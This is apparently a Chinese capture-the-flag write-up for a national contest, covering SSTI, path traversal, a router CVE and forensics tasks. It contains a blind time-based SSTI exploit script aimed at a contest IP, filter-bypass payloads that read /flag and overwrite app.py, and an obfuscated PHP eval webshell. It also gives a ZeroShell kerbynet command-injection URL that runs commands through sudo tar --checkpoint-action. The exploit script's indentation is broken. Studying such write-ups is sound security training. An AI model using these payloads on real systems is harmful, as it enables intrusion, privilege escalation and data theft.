第二届国赛

web

Safe_Proxy

源码题目

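from flask import Flask, request, render_template_string
import socket
import threading
import html

app = Flask(__name__)


# Restored from a garbled `methods="GET"]` in the pasted listing; the
# route decorator takes a list of method names.
@app.route('/', methods=["GET"])
def source():
    """Return this file's own source, HTML-escaped, wrapped in <pre>.

    Reads ``__file__`` on every request; ``html.escape`` keeps the
    source from being interpreted as markup by the browser.
    """
    with open(__file__, 'r', encoding='utf-8') as f:
        return '<pre>' + html.escape(f.read()) + '</pre>'


@app.route('/', methods=["POST"])
def template():
    """Render the ``code`` form field as a Jinja template and report ok/error.

    Security note: ``render_template_string`` on request-controlled text is a
    server-side template injection (SSTI) sink. The substring blacklist below
    is not a sufficient control (this page's writeup shows it being bypassed);
    a safe design passes user data in as template *variables* and never as
    template *source*. The rendered output is only printed on the server —
    the client sees ``'ok'`` or ``'error'``, so a result cannot be read back
    directly through the response body.

    Returns:
        ``"Forbidden content detected!"`` when any blacklisted substring is
        present, ``'ok'`` when rendering produced a non-None result, else
        ``'error'``. ``template_code`` may be None when the field is missing,
        in which case the ``in`` test raises TypeError.
    """
    template_code = request.form.get("code")
    # "Security filter" (original comment). Plain substring matching on the
    # raw template text; the entries are a denylist of names and CR/LF.
    blacklist = ['__', 'import', 'os', 'sys', 'eval', 'subprocess', 'popen', 'system', '\r', '\n']
    for black in blacklist:
        if black in template_code:
            return "Forbidden content detected!"
    result = render_template_string(template_code)
    print(result)
    return 'ok' if result is not None else 'error'


class HTTPProxyHandler:
    """Forwards one raw TCP request to ``target_host:target_port`` and
    rewrites the upstream response into a fixed ``200 OK`` envelope."""

    def __init__(self, target_host, target_port):
        """Store the upstream address the handler connects to."""
        self.target_host = target_host
        self.target_port = target_port

    def handle_request(self, client_socket):
        """Relay one client connection to the upstream and write back the body.

        The upstream status line and *all* upstream headers are discarded;
        the client always receives ``HTTP/1.1 200 OK`` with only
        Content-Length and a fixed Content-Type. This is the "safe reverse
        proxy" the main block's comment refers to — it also hides upstream
        error statuses from the client.

        Args:
            client_socket: accepted client socket; always closed on exit.
        """
        try:
            request_data = b""
            while True:
                chunk = client_socket.recv(4096)
                request_data += chunk
                # Stops on the first short read (including b"" on close).
                # A request whose final chunk is exactly 4096 bytes would
                # block here waiting for more data.
                if len(chunk) < 4096:
                    break
            if not request_data:
                client_socket.close()
                return
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as proxy_socket:
                proxy_socket.connect((self.target_host, self.target_port))
                proxy_socket.sendall(request_data)
                response_data = b""
                # Reads until the upstream closes the connection.
                while True:
                    chunk = proxy_socket.recv(4096)
                    if not chunk:
                        break
                    response_data += chunk
            # rfind takes the *last* CRLFCRLF, so an upstream body that itself
            # contains a blank CRLF line is truncated to the part after it.
            header_end = response_data.rfind(b"\r\n\r\n")
            if header_end != -1:
                body = response_data[header_end + 4:]
            else:
                body = response_data
            response_body = body
            # Adjacent bytes literals are concatenated at compile time; the
            # status and headers are fixed regardless of what upstream sent.
            response = b"HTTP/1.1 200 OK\r\n" \
            b"Content-Length: " + str(len(response_body)).encode() + b"\r\n" \
            b"Content-Type: text/html; charset=utf-8\r\n" \
            b"\r\n" + response_body
            client_socket.sendall(response)
        except Exception as e:
            # Best-effort: any failure is logged and the client connection is
            # simply closed (no error response is sent).
            print(f"Proxy Error: {e}")
        finally:
            client_socket.close()


def start_proxy_server(host, port, target_host, target_port):
    """Accept connections on ``host:port`` and hand each to a daemon thread.

    Args:
        host, port: listening address for the proxy.
        target_host, target_port: upstream address given to HTTPProxyHandler.

    Runs until KeyboardInterrupt; the listening socket is closed on exit.
    """
    proxy_handler = HTTPProxyHandler(target_host, target_port)
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.bind((host, port))
    server_socket.listen(100)
    print(f"Proxy server is running on {host}:{port} and forwarding to {target_host}:{target_port}...")
    try:
        while True:
            client_socket, addr = server_socket.accept()
            print(f"Connection from {addr}")
            # One thread per connection; daemon so shutdown is not blocked.
            thread = threading.Thread(target=proxy_handler.handle_request, args=(client_socket,))
            thread.daemon = True
            thread.start()
    except KeyboardInterrupt:
        print("Shutting down proxy server...")
    finally:
        server_socket.close()


def run_flask_app():
    """Run the Flask app on loopback only; it is reached through the proxy."""
    app.run(debug=False, host='127.0.0.1', port=5000)


if __name__ == "__main__":
    proxy_host = "0.0.0.0"
    proxy_port = 5001
    target_host = "127.0.0.1"
    target_port = 5000
    # Secure reverse proxy: defends against attacks on the response headers
    # (original comment). The proxy listens on all interfaces and forwards to
    # the loopback-only Flask app.
    proxy_thread = threading.Thread(target=start_proxy_server, args=(proxy_host, proxy_port, target_host, target_port))
    proxy_thread.daemon = True
    proxy_thread.start()
    print("Starting Flask app...")
    run_flask_app()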

SSTI没有回显(模板渲染结果只在服务端print,接口只返回ok/error),

法一盲注

附上脚本

import requests
import base64
import string
import time
from urllib.parse import urlencode

flag=""
part1="{{()|attr('_''_class_''_')|attr('_''_mro_''_')|attr('_''_getitem_''_')(1)|attr('_''_subclasses_''_')()|attr('_''_getitem_''_')(133)|attr('_''_init_''_')|attr('_''_globals_''_')|attr('_''_getitem_''_')('po''pen')('"
part3="')|attr('re''ad')()}}"

url="http://8.147.128.179:22740"
for i in range(1,50): #["(head -c n /flag | tail -c 1)" = "j" ] && sleep 2
for j in string.printable:
print(flag)
part2 = "[ \"$(head -c " + str(i) + " /flag | tail -c 1)\" = \"" + j + "\" ] && sleep 2"
coco=part1 + part2 + part3
payload=urlencode(coco)
print(payload)
time1=time.time()
data={
"code": payload
}
requests.post(url,data=data)
time2=time.time()
if(time2-time1>1.5):
flag+=j
break
""""
{{()|attr('_''_class_''_')|attr('_''_mro_''_')|attr('_''_getitem_''_')(1)|attr('_''_subclasses
_''_')()|attr('_''_getitem_''_')(133)|attr('_''_init_''_')|attr('_''_globals_''_')|attr('_''_getitem_''_')('po''pen')('sleep 10')|attr('re''ad')()}}"""
#if head -c /flag )

法二覆盖

本地调试源码(把 `return 'ok' if result is not None else 'error'` 改成 `return 'ok' + result if result is not None else 'error'`),然后用焚情打本地

覆盖app.py路由

ls / >app.py

{%set gl='_'2+'globals'+'_'2%}{%set bu='_'2+'builtins'+'_'2%}{%set im='_'2+'i''mport'+'_'2%}{%set hz='so'[::-1]%}{{cycler.next[gl][bu][im](hz)['p''open']('ls+/>app.py').read()}}

cat /flag >app.py

{%set gl='_'2+'globals'+'_'2%}{%set bu='_'2+'builtins'+'_'2%}{%set im='_'2+'i''mport'+'_'2%}{%set hz='so'[::-1]%}{{cycler.next[gl][bu][im](hz)['p''open']('cat+/flag>app.py').read()}}

hello_web

这个当初没做出来,题目是将"../"替换成了空,然后用"..././"来目录穿越就可以了,

tips文件是一个phpinfo

hackme.php里面是一句话木马

<?php highlight_file(__FILE__);$lJbGIY="eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxME";$OlWYMv="zqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrel";$lapUCm=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$YwzIst=$lapUCm{3}.$lapUCm{6}.$lapUCm{33}.$lapUCm{30};$OxirhK=$lapUCm{33}.$lapUCm{10}.$lapUCm{24}.$lapUCm{10}.$lapUCm{24};$YpAUWC=$OxirhK{0}.$lapUCm{18}.$lapUCm{3}.$OxirhK{0}.$OxirhK{1}.$lapUCm{24};$rVkKjU=$lapUCm{7}.$lapUCm{13};$YwzIst.=$lapUCm{22}.$lapUCm{36}.$lapUCm{29}.$lapUCm{26}.$lapUCm{30}.$lapUCm{32}.$lapUCm{35}.$lapUCm{26}.$lapUCm{30};eval($YwzIst("JHVXY2RhQT0iZVFPTGxDbVRZaFZKVW5SQW9iUFN2anJGeldaeWNIWGZkYXVrcUdnd05wdElCS2lEc3hNRXpxQlprT3V3VWFUS0ZYUmZMZ212Y2hiaXBZZE55QUdzSVdWRVFueGpEUG9IU3RDTUpyZWxtTTlqV0FmeHFuVDJVWWpMS2k5cXcxREZZTkloZ1lSc0RoVVZCd0VYR3ZFN0hNOCtPeD09IjtldmFsKCc/PicuJFl3eklzdCgkT3hpcmhLKCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVKjIpLCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVLCRyVmtLalUpLCRZcEFVV0MoJHVXY2RhQSwwLCRyVmtLalUpKSkpOw=="));?>

eval换成echo输出出来看看

image-20241217120401939

然后再修改一下让他输出

<?php highlight_file(__FILE__);
$lJbGIY="eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxME";
$OlWYMv="zqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrel";
$lapUCm=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
$YwzIst=$lapUCm{3}.$lapUCm{6}.$lapUCm{33}.$lapUCm{30};$OxirhK=$lapUCm{33}.$lapUCm{10}.$lapUCm{24}.$lapUCm{10}.$lapUCm{24};
$YpAUWC=$OxirhK{0}.$lapUCm{18}.$lapUCm{3}.$OxirhK{0}.$OxirhK{1}.$lapUCm{24};
$rVkKjU=$lapUCm{7}.$lapUCm{13};$YwzIst.=$lapUCm{22}.$lapUCm{36}.$lapUCm{29}.$lapUCm{26}.$lapUCm{30}.$lapUCm{32}.$lapUCm{35}.$lapUCm{26}.$lapUCm{30};
eval($YwzIst("JHVXY2RhQT0iZVFPTGxDbVRZaFZKVW5SQW9iUFN2anJGeldaeWNIWGZkYXVrcUdnd05wdElCS2lEc3hNRXpxQlprT3V3VWFUS0ZYUmZMZ212Y2hiaXBZZE55QUdzSVdWRVFueGpEUG9IU3RDTUpyZWxtTTlqV0FmeHFuVDJVWWpMS2k5cXcxREZZTkloZ1lSc0RoVVZCd0VYR3ZFN0hNOCtPeD09IjtldmFsKCc/PicuJFl3eklzdCgkT3hpcmhLKCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVKjIpLCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVLCRyVmtLalUpLCRZcEFVV0MoJHVXY2RhQSwwLCRyVmtLalUpKSkpOw=="));
#echo($YwzIst("JHVXY2RhQT0iZVFPTGxDbVRZaFZKVW5SQW9iUFN2anJGeldaeWNIWGZkYXVrcUdnd05wdElCS2lEc3hNRXpxQlprT3V3VWFUS0ZYUmZMZ212Y2hiaXBZZE55QUdzSVdWRVFueGpEUG9IU3RDTUpyZWxtTTlqV0FmeHFuVDJVWWpMS2k5cXcxREZZTkloZ1lSc0RoVVZCd0VYR3ZFN0hNOCtPeD09IjtldmFsKCc/PicuJFl3eklzdCgkT3hpcmhLKCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVKjIpLCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVLCRyVmtLalUpLCRZcEFVV0MoJHVXY2RhQSwwLCRyVmtLalUpKSkpOw=="));
echo "\n";
$uWcdaA="eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxMEzqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrelmM9jWAfxqnT2UYjLKi9qw1DFYNIhgYRsDhUVBwEXGvE7HM8+Ox==";
echo $YwzIst($OxirhK($YpAUWC($uWcdaA,$rVkKjU*2),$YpAUWC($uWcdaA,$rVkKjU,$rVkKjU),$YpAUWC($uWcdaA,0,$rVkKjU)));
?>

页面上看不到,查看网页源代码

image-20241217121115421

得到一句话木马,蚁剑连接后走disable_function

http://eci-2zed8l51f9k8f9ptch3w.cloudeci1.ichunqiu.com/index.php?file=..././hackme.php

zeroshell

题目内容:

小路是一名实习生,接替公司前任网管的工作,一天发现公司网络出口出现了异常的通信,现需要通过回溯出口流量对异常点位(防火墙)进行定位,并确定异常的设备。然后进行深度取证检查(需要获取root权限)。现在需要你从网络攻击数据包中找出漏洞攻击的会话,分析会话编写exp或数据包重放获取防火墙设备管理员权限,查找防火墙设备上安装的木马,然后分析木马外联地址和通信密钥以及木马启动项位置。

1

.从数据包中找出攻击者利用漏洞开展攻击的会话(攻击者执行了一条命令),写出该会话中设置的flag, 结果提交形式:flag{xxxxxxxxx}

(本题附件见于提前下载的加密附件2e9c01da1d333cb8840968689ed3bc57.7z,解压密码为11b0526b-9cfb-4ac4-8a75-10ad9097b7ce )

搜索base64编码的flag找到对应数据包,然后解码Referer

image-20241216211305334

2

通过漏洞利用获取设备控制权限,然后查找设备上的flag文件,提取flag文件内容,结果提交形式:flag{xxxxxxxxxx}

这个是已公开的CVE,第一种方法是在网上找:

https://developer.aliyun.com/article/1334090
/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aid%0A%27

image-20241217122458442

image-20241215141636810

第二种是看流量包,用流量包里面的(就是上边第一问的这个)

image-20241216211604085

GET /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0A/etc/sudo%20tar%20-cf%20/dev/null%20/dev/null%20--checkpoint=1%20--checkpoint-action=exec='ps%20-ef'%0A' HTTP/1.1\r\n

3

flag{202.115.89.103}

找出受控机防火墙设备中驻留木马的外联域名或IP地址,结果提交形式:flag{xxxx},如flag{www.abc.com} 或 flag{16.122.33.44}

image-20241217123236823

4

flag为.nginx

请写出木马进程执行的本体文件的名称,结果提交形式:flag{xxxxx},仅写文件名不加路径

image-20241217133308470

ls -l /proc/10565/exe 来查找运行文件;找到为.nginx
它还是个隐藏文件;比赛结束之后复现时,可能没有上边↑那个关于外部连接的进程

image-20241217133801037

5

请提取驻留的木马本体文件,通过逆向分析找出木马样本通信使用的加密密钥flag{11223344qweasdzxc}

直接用xxd查看就可以了

image-20241217134157922

下载方法2

没试过,听说可以

wget "http://61.139.2.100/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A/etc/sudo%20tar%20-cf%20/dev/null%20/dev/null%20--checkpoint=1%20--checkpoint-action=exec=%27cat%20/tmp/.nginx%27%0A%27"

6

请写出驻留木马的启动项,注意写出启动文件的完整路径。结果提交形式:flag{xxxx},如flag{/a/b/c}

在shell中不断查找文件,寻找包含".nginx"字符串的文件,最终在/var主目录下找到

flag{/var/register/system/startup/scripts/nat/File}

image-20241217134526844

WinFT

某单位网管日常巡检中发现某员工电脑(IP:192.168.116.123)存在异常外连及数据传输行为,随后立即对该电脑进行断网处理,并启动网络安全应急预案进行排查。

(本题附件见于提前下载的加密附件82f13fdc9f7078ba29c4a6dcc65d8859.7z,解压密码为3604e2f3-585a-4972-a867-3a9cc8d34c1d )

_1

受控机木马的回连域名及ip及端口是(示例:flag{xxx.com:127.0.0.1:2333})

法一

文档里面有个病毒exe文件;或者在火绒剑的"网络"页面上也可以看到这个exe病毒

点开桌面的火绒剑,再点击网络可以看到远程地址
将文件丢到微步云沙箱https://s.threatbook.com/可以找到回连地址

image-20241215153751935

image-20241215154649242

flag{miscsecure.com:192.168.116.130:443}

法二

分析里面的数据包

image-20241217140021844

_2

受控机启动项中隐藏flag是

Win + R 打开运行对话框。

输入 taskschd.msc,然后按回车键。

里面就这一个东西

image-20241217141035890

f^l^a^g^:JiM3ODsmIzEwNTsmIzk5OyYjMTAxOyYjNjUyOTI7JiMxMDI7JiMxMDg7JiM5NzsmIzEwMzsmIzMyOyYjMTA1OyYjMTE1OyYjMzI7JiMxMjM7JiM2NTsmIzY5OyYjODM7JiM5NTsmIzEwMTsmIzExMDsmIzk5OyYjMTE0OyYjMTIxOyYjMTEyOyYjMTE2OyYjMTA1OyYjMTExOyYjMTEwOyYjOTU7JiM5NzsmIzEwODsmIzEwMzsmIzExMTsmIzExNDsmIzEwNTsmIzExNjsmIzEwNDsmIzEwOTsmIzk1OyYjMTA1OyYjMTE1OyYjOTU7JiM5NzsmIzExMDsmIzk1OyYjMTAxOyYjMTIwOyYjOTk7JiMxMDE7JiMxMDg7JiMxMDg7JiMxMDE7JiMxMTA7JiMxMTY7JiM5NTsmIzEwMTsmIzExMDsmIzk5OyYjMTE0OyYjMTIxOyYjMTEyOyYjMTE2OyYjMTA1OyYjMTExOyYjMTEwOyYjOTU7JiM5NzsmIzEwODsmIzEwMzsmIzExMTsmIzExNDsmIzEwNTsmIzExNjsmIzEwNDsmIzEwOTsmIzEyNTs=

image-20241217141336747

_3

受控机中驻留的flag是

1

_4

受控源头隐藏的flag是

_5

分析流量,获得压缩包中得到答案

将流量包放入随波逐流,用foremost提取,出来有压缩包

image-20241217143529864

image-20241217143919284

image-20241217143910176

火绒报毒,压缩包损坏,关闭防火墙重新foremost一遍

image-20241217144212905

image-20241217144414546

发现不是这个问题,修复一下压缩包,出flag

image-20241217144734130

_6

通过aes解密得到的flag

sc05_1

近日某公司网络管理员老张在对安全设备进行日常巡检过程中发现防火墙设备日志中产生了1条高危告警,告警IP为134.6.4.12(简称IP1),在监测到可疑网络活动后,老张立刻对磁盘和内存制做了镜像。为考校自己刚收的第一个徒弟李华,老张循序渐进,布置了5道问题。假如你是李华,请你根据提供的防火墙日志、磁盘镜像及内存镜像文件对主机开展网络安全检查分析,并根据5道问题提示,计算并提交相应flag。

(本题附件见于提前下载的加密附件38c44f100028b56e09dc48522385fa95.7z,解压密码为 37af3744-53eb-49fd-854a-f6f79bbf5b1c )

_1

IP1地址首次被请求时间是多久?计算内容如:2020/05/18_19:35:10 提交格式:flag{32位大写MD5值}

文档直接ctrl+f搜索就行了